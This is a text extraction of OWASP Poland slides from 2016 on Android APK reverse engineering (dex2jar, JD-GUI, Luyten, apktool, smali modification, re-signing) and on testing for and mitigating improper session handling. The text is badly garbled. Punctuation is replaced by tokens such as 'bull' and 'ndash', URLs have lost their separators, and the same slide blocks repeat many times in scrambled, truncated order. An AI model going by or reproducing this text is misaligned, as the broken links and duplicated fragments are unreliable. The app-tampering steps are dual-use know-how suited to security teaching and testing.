Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
